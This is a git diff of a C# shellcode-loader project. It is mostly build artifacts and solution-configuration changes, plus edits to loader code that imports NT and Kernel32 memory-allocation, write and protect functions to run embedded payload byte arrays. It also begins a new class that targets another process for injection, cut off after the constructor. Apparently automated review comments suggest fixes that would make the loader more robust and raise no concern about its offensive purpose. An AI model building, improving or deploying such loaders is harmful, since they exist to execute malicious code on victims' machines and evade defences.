diff --git a/.vs/ShellCodeLoader/v16/.suo b/.vs/ShellCodeLoader/v16/.suo
index 2faaea6..1035691 100644
Binary files a/.vs/ShellCodeLoader/v16/.suo and b/.vs/ShellCodeLoader/v16/.suo differ
diff --git a/.vs/ShellCodeLoader/v16/Browse.VC.db b/.vs/ShellCodeLoader/v16/Browse.VC.db
index a00aa95..cad4441 100644
Binary files a/.vs/ShellCodeLoader/v16/Browse.VC.db and b/.vs/ShellCodeLoader/v16/Browse.VC.db differ
diff --git a/.vs/ShellCodeLoader/v16/Browse.VC.db-shm b/.vs/ShellCodeLoader/v16/Browse.VC.db-shm
index 9f63776..e676db6 100644
Binary files a/.vs/ShellCodeLoader/v16/Browse.VC.db-shm and b/.vs/ShellCodeLoader/v16/Browse.VC.db-shm differ
diff --git a/.vs/ShellCodeLoader/v16/Solution.VC.db b/.vs/ShellCodeLoader/v16/Solution.VC.db
index 86bbea7..abe732c 100644
Binary files a/.vs/ShellCodeLoader/v16/Solution.VC.db and b/.vs/ShellCodeLoader/v16/Solution.VC.db differ
diff --git a/.vs/ShellCodeLoader/v16/Solution.VC.db-shm b/.vs/ShellCodeLoader/v16/Solution.VC.db-shm
index ad86a11..78ff730 100644
Binary files a/.vs/ShellCodeLoader/v16/Solution.VC.db-shm and b/.vs/ShellCodeLoader/v16/Solution.VC.db-shm differ
diff --git a/.vs/ShellCodeLoader/v16/Solution.VC.db-wal b/.vs/ShellCodeLoader/v16/Solution.VC.db-wal
index bfad33a..8c435cf 100644
Binary files a/.vs/ShellCodeLoader/v16/Solution.VC.db-wal and b/.vs/ShellCodeLoader/v16/Solution.VC.db-wal differ
diff --git a/PayloadCSharp/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache b/PayloadCSharp/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache
index 3e628d9..5dfb61c 100644
Binary files a/PayloadCSharp/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache and b/PayloadCSharp/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache differ
diff --git a/PayloadCSharp/obj/Debug/PayloadCSharp.csproj.AssemblyReference.cache b/PayloadCSharp/obj/Debug/PayloadCSharp.csproj.AssemblyReference.cache
new file mode 100644
index 0000000..1623316
Binary files /dev/null and b/PayloadCSharp/obj/Debug/PayloadCSharp.csproj.AssemblyReference.cache differ
diff --git a/PayloadCSharp/obj/Debug/PayloadCSharp.csproj.CoreCompileInputs.cache b/PayloadCSharp/obj/Debug/PayloadCSharp.csproj.CoreCompileInputs.cache
new file mode 100644
index 0000000..850b656
--- /dev/null
+++ b/PayloadCSharp/obj/Debug/PayloadCSharp.csproj.CoreCompileInputs.cache
@@ -0,0 +1 @@
+f28cb18b6464b65741bdd61cdf8994c9416493a7
diff --git a/PayloadCSharp/obj/Debug/PayloadCSharp.csproj.FileListAbsolute.txt b/PayloadCSharp/obj/Debug/PayloadCSharp.csproj.FileListAbsolute.txt
new file mode 100644
index 0000000..5741a0d
--- /dev/null
+++ b/PayloadCSharp/obj/Debug/PayloadCSharp.csproj.FileListAbsolute.txt
@@ -0,0 +1,6 @@
+F:\Personal\ShellCodeLoader\PayloadCSharp\bin\Debug\PayloadCSharp.exe.config
+F:\Personal\ShellCodeLoader\PayloadCSharp\bin\Debug\PayloadCSharp.exe
+F:\Personal\ShellCodeLoader\PayloadCSharp\bin\Debug\PayloadCSharp.pdb
+F:\Personal\ShellCodeLoader\PayloadCSharp\obj\Debug\PayloadCSharp.csproj.CoreCompileInputs.cache
+F:\Personal\ShellCodeLoader\PayloadCSharp\obj\Debug\PayloadCSharp.exe
+F:\Personal\ShellCodeLoader\PayloadCSharp\obj\Debug\PayloadCSharp.pdb
diff --git a/PayloadCSharp/obj/Debug/PayloadCSharp.exe b/PayloadCSharp/obj/Debug/PayloadCSharp.exe
new file mode 100644
index 0000000..b67b8fc
Binary files /dev/null and b/PayloadCSharp/obj/Debug/PayloadCSharp.exe differ
diff --git a/PayloadCSharp/obj/Debug/PayloadCSharp.pdb b/PayloadCSharp/obj/Debug/PayloadCSharp.pdb
new file mode 100644
index 0000000..fd0091c
Binary files /dev/null and b/PayloadCSharp/obj/Debug/PayloadCSharp.pdb differ
diff --git a/PayloadCSharp/obj/Release/PayloadCSharp.csproj.AssemblyReference.cache b/PayloadCSharp/obj/Release/PayloadCSharp.csproj.AssemblyReference.cache
index d1579b8..f5e894a 100644
Binary files a/PayloadCSharp/obj/Release/PayloadCSharp.csproj.AssemblyReference.cache and b/PayloadCSharp/obj/Release/PayloadCSharp.csproj.AssemblyReference.cache differ
diff --git a/PayloadCSharp/obj/x64/Release/PayloadCSharp.csproj.AssemblyReference.cache b/PayloadCSharp/obj/x64/Release/PayloadCSharp.csproj.AssemblyReference.cache
index 8ad0473..cf2ea7b 100644
Binary files a/PayloadCSharp/obj/x64/Release/PayloadCSharp.csproj.AssemblyReference.cache and b/PayloadCSharp/obj/x64/Release/PayloadCSharp.csproj.AssemblyReference.cache differ
diff --git a/PayloadCpp/Release/PayloadCpp.iobj b/PayloadCpp/Release/PayloadCpp.iobj
index 2122cdf..3ca0682 100644
Binary files a/PayloadCpp/Release/PayloadCpp.iobj and b/PayloadCpp/Release/PayloadCpp.iobj differ
diff --git a/PayloadCpp/Release/PayloadCpp.ipdb b/PayloadCpp/Release/PayloadCpp.ipdb
index 213ba64..4f6940c 100644
Binary files a/PayloadCpp/Release/PayloadCpp.ipdb and b/PayloadCpp/Release/PayloadCpp.ipdb differ
diff --git a/PayloadCpp/Release/PayloadCpp.log b/PayloadCpp/Release/PayloadCpp.log
index d6323d7..3d8ddc8 100644
--- a/PayloadCpp/Release/PayloadCpp.log
+++ b/PayloadCpp/Release/PayloadCpp.log
@@ -1,7 +1,7 @@
pch.cpp
dllmain.cpp
Génération de code en cours
- Previous IPDB not found, fall back to full compilation.
+ Previous IPDB was built with incompatible compiler, fall back to full compilation.
All 1 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
Fin de la génération du code
PayloadCpp.vcxproj -> F:\Personal\ShellCodeLoader\Release\PayloadCpp.dll
diff --git a/PayloadCpp/Release/PayloadCpp.pch b/PayloadCpp/Release/PayloadCpp.pch
index cbb9167..42f42a3 100644
Binary files a/PayloadCpp/Release/PayloadCpp.pch and b/PayloadCpp/Release/PayloadCpp.pch differ
diff --git a/PayloadCpp/Release/PayloadCpp.tlog/CL.command.1.tlog b/PayloadCpp/Release/PayloadCpp.tlog/CL.command.1.tlog
index 0afe9e0..b4866e3 100644
Binary files a/PayloadCpp/Release/PayloadCpp.tlog/CL.command.1.tlog and b/PayloadCpp/Release/PayloadCpp.tlog/CL.command.1.tlog differ
diff --git a/PayloadCpp/Release/PayloadCpp.tlog/CL.read.1.tlog b/PayloadCpp/Release/PayloadCpp.tlog/CL.read.1.tlog
index caa70be..47ae584 100644
Binary files a/PayloadCpp/Release/PayloadCpp.tlog/CL.read.1.tlog and b/PayloadCpp/Release/PayloadCpp.tlog/CL.read.1.tlog differ
diff --git a/PayloadCpp/Release/PayloadCpp.tlog/PayloadCpp.lastbuildstate b/PayloadCpp/Release/PayloadCpp.tlog/PayloadCpp.lastbuildstate
index 35c4dc2..c07b34d 100644
--- a/PayloadCpp/Release/PayloadCpp.tlog/PayloadCpp.lastbuildstate
+++ b/PayloadCpp/Release/PayloadCpp.tlog/PayloadCpp.lastbuildstate
@@ -1,2 +1,2 @@
-PlatformToolSet=v142:VCToolArchitecture=Native32Bit:VCToolsVersion=14.29.30037:VCServicingVersionMFC=14.29.30038:VCServicingVersionATL=14.29.30038:VCServicingVersionCrtHeaders=14.29.30038:VCServicingVersionCompilers=14.29.30038:TargetPlatformVersion=10.0.19041.0:
+PlatformToolSet=v142:VCToolArchitecture=Native32Bit:VCToolsVersion=14.29.30133:VCServicingVersionMFC=14.29.30136:VCServicingVersionATL=14.29.30136:VCServicingVersionCrtHeaders=14.29.30136:VCServicingVersionCompilers=14.29.30136:TargetPlatformVersion=10.0.19041.0:
Release|Win32|F:\Personal\ShellCodeLoader\|
diff --git a/PayloadCpp/Release/PayloadCpp.tlog/link.read.1.tlog b/PayloadCpp/Release/PayloadCpp.tlog/link.read.1.tlog
index 67e931a..ed0f5c0 100644
Binary files a/PayloadCpp/Release/PayloadCpp.tlog/link.read.1.tlog and b/PayloadCpp/Release/PayloadCpp.tlog/link.read.1.tlog differ
diff --git a/PayloadCpp/Release/dllmain.obj b/PayloadCpp/Release/dllmain.obj
index f7c3e20..62659b4 100644
Binary files a/PayloadCpp/Release/dllmain.obj and b/PayloadCpp/Release/dllmain.obj differ
diff --git a/PayloadCpp/Release/pch.obj b/PayloadCpp/Release/pch.obj
index e75dd3a..84c773a 100644
Binary files a/PayloadCpp/Release/pch.obj and b/PayloadCpp/Release/pch.obj differ
diff --git a/PayloadCpp/Release/vc142.pdb b/PayloadCpp/Release/vc142.pdb
index 21d3d1c..9dc8583 100644
Binary files a/PayloadCpp/Release/vc142.pdb and b/PayloadCpp/Release/vc142.pdb differ
diff --git a/PayloadCpp/x64/Debug/PayloadCpp.dll.recipe b/PayloadCpp/x64/Debug/PayloadCpp.dll.recipe
new file mode 100644
index 0000000..bdbdd42
--- /dev/null
+++ b/PayloadCpp/x64/Debug/PayloadCpp.dll.recipe
@@ -0,0 +1,11 @@
+
+
+
+
+ F:\Personal\ShellCodeLoader\x64\Debug\PayloadCpp.dll
+
+
+
+
+
+
\ No newline at end of file
diff --git a/PayloadCpp/x64/Debug/PayloadCpp.ilk b/PayloadCpp/x64/Debug/PayloadCpp.ilk
new file mode 100644
index 0000000..38e03e1
Binary files /dev/null and b/PayloadCpp/x64/Debug/PayloadCpp.ilk differ
diff --git a/PayloadCpp/x64/Debug/PayloadCpp.log b/PayloadCpp/x64/Debug/PayloadCpp.log
new file mode 100644
index 0000000..781f4c8
--- /dev/null
+++ b/PayloadCpp/x64/Debug/PayloadCpp.log
@@ -0,0 +1,3 @@
+ pch.cpp
+ dllmain.cpp
+ PayloadCpp.vcxproj -> F:\Personal\ShellCodeLoader\x64\Debug\PayloadCpp.dll
diff --git a/PayloadCpp/x64/Debug/PayloadCpp.pch b/PayloadCpp/x64/Debug/PayloadCpp.pch
new file mode 100644
index 0000000..59ac4ea
Binary files /dev/null and b/PayloadCpp/x64/Debug/PayloadCpp.pch differ
diff --git a/PayloadCpp/x64/Debug/PayloadCpp.tlog/CL.command.1.tlog b/PayloadCpp/x64/Debug/PayloadCpp.tlog/CL.command.1.tlog
new file mode 100644
index 0000000..0257628
Binary files /dev/null and b/PayloadCpp/x64/Debug/PayloadCpp.tlog/CL.command.1.tlog differ
diff --git a/PayloadCpp/x64/Debug/PayloadCpp.tlog/CL.read.1.tlog b/PayloadCpp/x64/Debug/PayloadCpp.tlog/CL.read.1.tlog
new file mode 100644
index 0000000..a6437fb
Binary files /dev/null and b/PayloadCpp/x64/Debug/PayloadCpp.tlog/CL.read.1.tlog differ
diff --git a/PayloadCpp/x64/Debug/PayloadCpp.tlog/CL.write.1.tlog b/PayloadCpp/x64/Debug/PayloadCpp.tlog/CL.write.1.tlog
new file mode 100644
index 0000000..39875b0
Binary files /dev/null and b/PayloadCpp/x64/Debug/PayloadCpp.tlog/CL.write.1.tlog differ
diff --git a/PayloadCpp/x64/Debug/PayloadCpp.tlog/PayloadCpp.lastbuildstate b/PayloadCpp/x64/Debug/PayloadCpp.tlog/PayloadCpp.lastbuildstate
new file mode 100644
index 0000000..efab2db
--- /dev/null
+++ b/PayloadCpp/x64/Debug/PayloadCpp.tlog/PayloadCpp.lastbuildstate
@@ -0,0 +1,2 @@
+PlatformToolSet=v142:VCToolArchitecture=Native32Bit:VCToolsVersion=14.29.30037:VCServicingVersionMFC=14.29.30038:VCServicingVersionATL=14.29.30038:VCServicingVersionCrtHeaders=14.29.30038:VCServicingVersionCompilers=14.29.30038:TargetPlatformVersion=10.0.19041.0:
+Debug|x64|F:\Personal\ShellCodeLoader\|
diff --git a/PayloadCpp/x64/Debug/PayloadCpp.tlog/link.command.1.tlog b/PayloadCpp/x64/Debug/PayloadCpp.tlog/link.command.1.tlog
new file mode 100644
index 0000000..b55ba4a
Binary files /dev/null and b/PayloadCpp/x64/Debug/PayloadCpp.tlog/link.command.1.tlog differ
diff --git a/PayloadCpp/x64/Debug/PayloadCpp.tlog/link.read.1.tlog b/PayloadCpp/x64/Debug/PayloadCpp.tlog/link.read.1.tlog
new file mode 100644
index 0000000..ecb0b87
Binary files /dev/null and b/PayloadCpp/x64/Debug/PayloadCpp.tlog/link.read.1.tlog differ
diff --git a/PayloadCpp/x64/Debug/PayloadCpp.tlog/link.write.1.tlog b/PayloadCpp/x64/Debug/PayloadCpp.tlog/link.write.1.tlog
new file mode 100644
index 0000000..c9eeb4f
Binary files /dev/null and b/PayloadCpp/x64/Debug/PayloadCpp.tlog/link.write.1.tlog differ
diff --git a/PayloadCpp/x64/Debug/dllmain.obj b/PayloadCpp/x64/Debug/dllmain.obj
new file mode 100644
index 0000000..f6a726b
Binary files /dev/null and b/PayloadCpp/x64/Debug/dllmain.obj differ
diff --git a/PayloadCpp/x64/Debug/pch.obj b/PayloadCpp/x64/Debug/pch.obj
new file mode 100644
index 0000000..8e28a03
Binary files /dev/null and b/PayloadCpp/x64/Debug/pch.obj differ
diff --git a/PayloadCpp/x64/Debug/vc142.idb b/PayloadCpp/x64/Debug/vc142.idb
new file mode 100644
index 0000000..004f1c2
Binary files /dev/null and b/PayloadCpp/x64/Debug/vc142.idb differ
diff --git a/PayloadCpp/x64/Debug/vc142.pdb b/PayloadCpp/x64/Debug/vc142.pdb
new file mode 100644
index 0000000..cf2a19e
Binary files /dev/null and b/PayloadCpp/x64/Debug/vc142.pdb differ
diff --git a/PayloadCpp/x64/Release/PayloadCpp.iobj b/PayloadCpp/x64/Release/PayloadCpp.iobj
index 01f6a92..41c191b 100644
Binary files a/PayloadCpp/x64/Release/PayloadCpp.iobj and b/PayloadCpp/x64/Release/PayloadCpp.iobj differ
diff --git a/PayloadCpp/x64/Release/PayloadCpp.ipdb b/PayloadCpp/x64/Release/PayloadCpp.ipdb
index 2ec069b..183491e 100644
Binary files a/PayloadCpp/x64/Release/PayloadCpp.ipdb and b/PayloadCpp/x64/Release/PayloadCpp.ipdb differ
diff --git a/PayloadCpp/x64/Release/PayloadCpp.log b/PayloadCpp/x64/Release/PayloadCpp.log
index a9b3dcb..11595c2 100644
--- a/PayloadCpp/x64/Release/PayloadCpp.log
+++ b/PayloadCpp/x64/Release/PayloadCpp.log
@@ -1,7 +1,6 @@
- pch.cpp
- dllmain.cpp
- Génération de code en cours
- Previous IPDB not found, fall back to full compilation.
- All 1 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
+ Génération de code en cours
+ 0 of 1 functions ( 0.0%) were compiled, the rest were copied from previous compilation.
+ 0 functions were new in current compilation
+ 0 functions had inline decision re-evaluated but remain unchanged
Fin de la génération du code
PayloadCpp.vcxproj -> F:\Personal\ShellCodeLoader\x64\Release\PayloadCpp.dll
diff --git a/PayloadCpp/x64/Release/PayloadCpp.pch b/PayloadCpp/x64/Release/PayloadCpp.pch
index 8d40ffe..5bb1970 100644
Binary files a/PayloadCpp/x64/Release/PayloadCpp.pch and b/PayloadCpp/x64/Release/PayloadCpp.pch differ
diff --git a/PayloadCpp/x64/Release/PayloadCpp.tlog/CL.command.1.tlog b/PayloadCpp/x64/Release/PayloadCpp.tlog/CL.command.1.tlog
index 1ef95a6..7dde15f 100644
Binary files a/PayloadCpp/x64/Release/PayloadCpp.tlog/CL.command.1.tlog and b/PayloadCpp/x64/Release/PayloadCpp.tlog/CL.command.1.tlog differ
diff --git a/PayloadCpp/x64/Release/PayloadCpp.tlog/CL.read.1.tlog b/PayloadCpp/x64/Release/PayloadCpp.tlog/CL.read.1.tlog
index 471e92a..a000923 100644
Binary files a/PayloadCpp/x64/Release/PayloadCpp.tlog/CL.read.1.tlog and b/PayloadCpp/x64/Release/PayloadCpp.tlog/CL.read.1.tlog differ
diff --git a/PayloadCpp/x64/Release/PayloadCpp.tlog/PayloadCpp.lastbuildstate b/PayloadCpp/x64/Release/PayloadCpp.tlog/PayloadCpp.lastbuildstate
index 7d42aaa..701005c 100644
--- a/PayloadCpp/x64/Release/PayloadCpp.tlog/PayloadCpp.lastbuildstate
+++ b/PayloadCpp/x64/Release/PayloadCpp.tlog/PayloadCpp.lastbuildstate
@@ -1,2 +1,2 @@
-PlatformToolSet=v142:VCToolArchitecture=Native32Bit:VCToolsVersion=14.29.30037:VCServicingVersionMFC=14.29.30038:VCServicingVersionATL=14.29.30038:VCServicingVersionCrtHeaders=14.29.30038:VCServicingVersionCompilers=14.29.30038:TargetPlatformVersion=10.0.19041.0:
+PlatformToolSet=v142:VCToolArchitecture=Native32Bit:VCToolsVersion=14.29.30133:VCServicingVersionMFC=14.29.30136:VCServicingVersionATL=14.29.30136:VCServicingVersionCrtHeaders=14.29.30136:VCServicingVersionCompilers=14.29.30136:TargetPlatformVersion=10.0.19041.0:
Release|x64|F:\Personal\ShellCodeLoader\|
diff --git a/PayloadCpp/x64/Release/PayloadCpp.tlog/link.read.1.tlog b/PayloadCpp/x64/Release/PayloadCpp.tlog/link.read.1.tlog
index f098248..16f8571 100644
Binary files a/PayloadCpp/x64/Release/PayloadCpp.tlog/link.read.1.tlog and b/PayloadCpp/x64/Release/PayloadCpp.tlog/link.read.1.tlog differ
diff --git a/PayloadCpp/x64/Release/dllmain.obj b/PayloadCpp/x64/Release/dllmain.obj
index 1a96d9f..520581b 100644
Binary files a/PayloadCpp/x64/Release/dllmain.obj and b/PayloadCpp/x64/Release/dllmain.obj differ
diff --git a/PayloadCpp/x64/Release/pch.obj b/PayloadCpp/x64/Release/pch.obj
index 8c536db..935993b 100644
Binary files a/PayloadCpp/x64/Release/pch.obj and b/PayloadCpp/x64/Release/pch.obj differ
diff --git a/PayloadCpp/x64/Release/vc142.pdb b/PayloadCpp/x64/Release/vc142.pdb
index 0107b62..be9e4de 100644
Binary files a/PayloadCpp/x64/Release/vc142.pdb and b/PayloadCpp/x64/Release/vc142.pdb differ
diff --git a/Payloads/PayloadCpp64.cs b/Payloads/PayloadCpp64.cs
index 470aa18..6466929 100644
--- a/Payloads/PayloadCpp64.cs
+++ b/Payloads/PayloadCpp64.cs
@@ -4,7 +4,8 @@
*/
namespace Test
{
- public class PayloadCpp64{
+ public class PayloadCpp64
+ {
public static byte[] rawData = {
0xE8, 0x80, 0x3D, 0x00, 0x00, 0x80, 0x3D, 0x00, 0x00, 0x0F, 0x21, 0x6B,
0xEB, 0xA9, 0xDF, 0xEA, 0x5F, 0x88, 0xCC, 0x42, 0xF0, 0xA3, 0x19, 0x64,
diff --git a/ShellCodeLoader.sln b/ShellCodeLoader.sln
index 7b17628..328d6de 100644
--- a/ShellCodeLoader.sln
+++ b/ShellCodeLoader.sln
@@ -23,8 +23,8 @@ Global
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{B2A57A97-4D88-4942-A4B3-06AA466080F2}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{B2A57A97-4D88-4942-A4B3-06AA466080F2}.Debug|Any CPU.Build.0 = Debug|Any CPU
- {B2A57A97-4D88-4942-A4B3-06AA466080F2}.Debug|x64.ActiveCfg = Debug|Any CPU
- {B2A57A97-4D88-4942-A4B3-06AA466080F2}.Debug|x64.Build.0 = Debug|Any CPU
+ {B2A57A97-4D88-4942-A4B3-06AA466080F2}.Debug|x64.ActiveCfg = Release|Any CPU
+ {B2A57A97-4D88-4942-A4B3-06AA466080F2}.Debug|x64.Build.0 = Release|Any CPU
{B2A57A97-4D88-4942-A4B3-06AA466080F2}.Debug|x86.ActiveCfg = Debug|Any CPU
{B2A57A97-4D88-4942-A4B3-06AA466080F2}.Debug|x86.Build.0 = Debug|Any CPU
{B2A57A97-4D88-4942-A4B3-06AA466080F2}.Release|Any CPU.ActiveCfg = Release|Any CPU
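Review bot: The `Debug|x64` solution configuration now maps project `{B2A57A97-4D88-4942-A4B3-06AA466080F2}` to `Release|Any CPU`, so a Debug x64 solution build silently produces a Release binary of that project. The next hunk has mismatches of the same kind: `{9B489FF7-…}` gets `Release|Any CPU` → `Release|x64` while its `Release|x64` row still points at `Release|Any CPU`, and `{05027976-…}` gets `Debug|x64` → `Debug|Win32`, which puts a 32-bit build under an x64 solution platform. These look like accidental Configuration Manager edits; if they are not, each row should name the matching configuration and platform, e.g. `{B2A57A97-…}.Debug|x64.ActiveCfg = Debug|Any CPU`.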
@@ -35,19 +35,19 @@ Global
{B2A57A97-4D88-4942-A4B3-06AA466080F2}.Release|x86.Build.0 = Release|Any CPU
{9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Debug|Any CPU.Build.0 = Debug|Any CPU
- {9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Debug|x64.ActiveCfg = Debug|x64
- {9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Debug|x64.Build.0 = Debug|x64
+ {9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Debug|x64.ActiveCfg = Debug|Any CPU
+ {9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Debug|x64.Build.0 = Debug|Any CPU
{9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Debug|x86.ActiveCfg = Debug|Any CPU
{9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Debug|x86.Build.0 = Debug|Any CPU
- {9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Release|Any CPU.ActiveCfg = Debug|Any CPU
- {9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Release|Any CPU.Build.0 = Debug|Any CPU
+ {9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Release|Any CPU.ActiveCfg = Release|x64
+ {9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Release|Any CPU.Build.0 = Release|x64
{9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Release|x64.ActiveCfg = Release|Any CPU
{9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Release|x64.Build.0 = Release|Any CPU
{9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Release|x86.ActiveCfg = Release|Any CPU
{9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Release|x86.Build.0 = Release|Any CPU
{05027976-CAC5-447F-84B6-77F38AF2566C}.Debug|Any CPU.ActiveCfg = Debug|Win32
- {05027976-CAC5-447F-84B6-77F38AF2566C}.Debug|x64.ActiveCfg = Debug|x64
- {05027976-CAC5-447F-84B6-77F38AF2566C}.Debug|x64.Build.0 = Debug|x64
+ {05027976-CAC5-447F-84B6-77F38AF2566C}.Debug|x64.ActiveCfg = Debug|Win32
+ {05027976-CAC5-447F-84B6-77F38AF2566C}.Debug|x64.Build.0 = Debug|Win32
{05027976-CAC5-447F-84B6-77F38AF2566C}.Debug|x86.ActiveCfg = Debug|Win32
{05027976-CAC5-447F-84B6-77F38AF2566C}.Debug|x86.Build.0 = Debug|Win32
{05027976-CAC5-447F-84B6-77F38AF2566C}.Release|Any CPU.ActiveCfg = Release|x64
diff --git a/ShellCodeLoader/ShellCodeLoader.cs b/ShellCodeLoader/ShellCodeLoader.cs
index 0697279..b8a9edd 100644
--- a/ShellCodeLoader/ShellCodeLoader.cs
+++ b/ShellCodeLoader/ShellCodeLoader.cs
@@ -1,5 +1,6 @@
using System;
using System.Runtime.InteropServices;
+using System.Threading;
using System.Threading.Tasks;
using Microsoft.Win32.SafeHandles;
/*
@@ -9,6 +10,7 @@
*/
namespace ShellCodeLoader
{
+
public class ShellCodeLoader : IDisposable
{
private byte[] ShellCode;
@@ -34,10 +36,12 @@ public void LoadWithNT()
{
if (this.Asynchronous)
{
- Task.Run(() =>
+ Task.Factory.StartNew(() => { NT(); }, CancellationToken.None, TaskCreationOptions.None, TaskScheduler.Default);
+ //Replace Task.Run with Task.Factory.StartNew for .net 4
+ /*Task.Run(() =>
{
NT();
- });
+ });*/
}
else
{
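Review bot: The `Task` returned by `Task.Factory.StartNew(() => { NT(); }, …)` is discarded, so an exception thrown inside `NT()` is never observed. This commit also retargets the project to v4.0, and on a machine that has only the .NET 4.0 runtime an unobserved task exception is escalated when the task is finalized and by default terminates the process. The same pattern is in the three following hunks (`LoadWithKernel32`, `LoadWithNTDelegates`, `LoadWithKernel32Delegates`). Consider observing the fault, for example by appending `.ContinueWith(t => Trace.TraceError(t.Exception.ToString()), TaskContinuationOptions.OnlyOnFaulted)`. The commented-out `/*Task.Run(...)*/` block can then be deleted, since the `//Replace Task.Run with Task.Factory.StartNew for .net 4` comment already records the reason. The bodies of these methods start and end outside the hunks.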
@@ -49,10 +53,7 @@ public void LoadWithKernel32()
{
if (this.Asynchronous)
{
- Task.Run(() =>
- {
- Kernel32();
- });
+ Task.Factory.StartNew(() => { Kernel32(); }, CancellationToken.None, TaskCreationOptions.None, TaskScheduler.Default);
}
else
{
@@ -64,10 +65,8 @@ public void LoadWithNTDelegates()
{
if (this.Asynchronous)
{
- Task.Run(() =>
- {
- NTDelegates();
- });
+ Task.Factory.StartNew(() => { NTDelegates(); }, CancellationToken.None, TaskCreationOptions.None, TaskScheduler.Default);
+
}
else
{
@@ -79,7 +78,7 @@ public void LoadWithKernel32Delegates()
{
if (this.Asynchronous)
{
- Kernel32Delegates();
+ Task.Factory.StartNew(() => { Kernel32Delegates(); }, CancellationToken.None, TaskCreationOptions.None, TaskScheduler.Default);
}
else
{
@@ -167,26 +166,36 @@ private static class Imports
[DllImport(NTDLL, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
public static extern uint NtAllocateVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, IntPtr ZeroBits, ref uint RegionSize, TypeAlloc AllocationType, PageProtection Protect);
+
[DllImport(NTDLL, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
public static extern uint NtWriteVirtualMemory(IntPtr ProcessHandle, IntPtr BaseAddress, byte[] buffer, UIntPtr bufferSize, out UIntPtr written);
+
[DllImport(NTDLL, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
public static extern uint NtProtectVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref uint numberOfBytes, PageProtection newProtect, ref PageProtection oldProtect);
+
[DllImport(NTDLL, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
public static extern uint NtFreeVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref uint RegionSize, FreeType FreeType);
- [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
- public static extern IntPtr GetCurrentProcess();
+
+
[DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
public static extern IntPtr VirtualAlloc(IntPtr address, IntPtr numBytes, TypeAlloc commitOrReserve, PageProtection pageProtectionMode);
+
[DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
public static extern IntPtr VirtualFree(IntPtr lpAddress, uint dwSize, FreeType FreeType);
+
[DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
public static extern bool VirtualProtect(IntPtr lpAddress, uint dwSize, PageProtection flNewProtect, out PageProtection lpflOldProtect);
+
[DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, UIntPtr nSize, out UIntPtr lpNumberOfBytesWritten);
+ [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
+ public static extern IntPtr GetCurrentProcess();
+
[DllImport(KERNEL32)]
public static extern IntPtr GetModuleHandle(string lpModuleName);
+
[DllImport(KERNEL32)]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
diff --git a/ShellCodeLoader/ShellCodeLoader.csproj b/ShellCodeLoader/ShellCodeLoader.csproj
index 3d87c82..b7dc630 100644
--- a/ShellCodeLoader/ShellCodeLoader.csproj
+++ b/ShellCodeLoader/ShellCodeLoader.csproj
@@ -9,9 +9,10 @@
Properties
ShellCodeLoader
ShellCodeLoader
- v4.5
+ v4.0
512
true
+
true
@@ -29,6 +30,25 @@
TRACE
prompt
4
+ true
+
+
+ true
+ bin\x64\Debug\
+ DEBUG;TRACE
+ full
+ x64
+ 7.3
+ prompt
+
+
+ bin\x64\Release\
+ TRACE
+ true
+ pdbonly
+ x64
+ 7.3
+ prompt
@@ -37,6 +57,7 @@
+
\ No newline at end of file
diff --git a/ShellCodeLoader/ShellCodeLoaderEx.cs b/ShellCodeLoader/ShellCodeLoaderEx.cs
new file mode 100644
index 0000000..d571499
--- /dev/null
+++ b/ShellCodeLoader/ShellCodeLoaderEx.cs
@@ -0,0 +1,183 @@
+using Microsoft.Win32.SafeHandles;
+using System;
+using System.Diagnostics;
+using System.Runtime.InteropServices;
+/*
+|| AUTHOR Arsium ||
+|| github : https://github.com/arsium ||
+|| Please let this credit for all the time I worked on ||
+ */
+namespace ShellCodeLoader
+{
+ public class ShellCodeLoaderEx
+ {
+ private byte[] ShellCode;
+ private IntPtr ptr;
+ private uint RegionSize;
+ private Process Target;
+
+ public ShellCodeLoaderEx(Process target, byte[] shellCode)
+ {
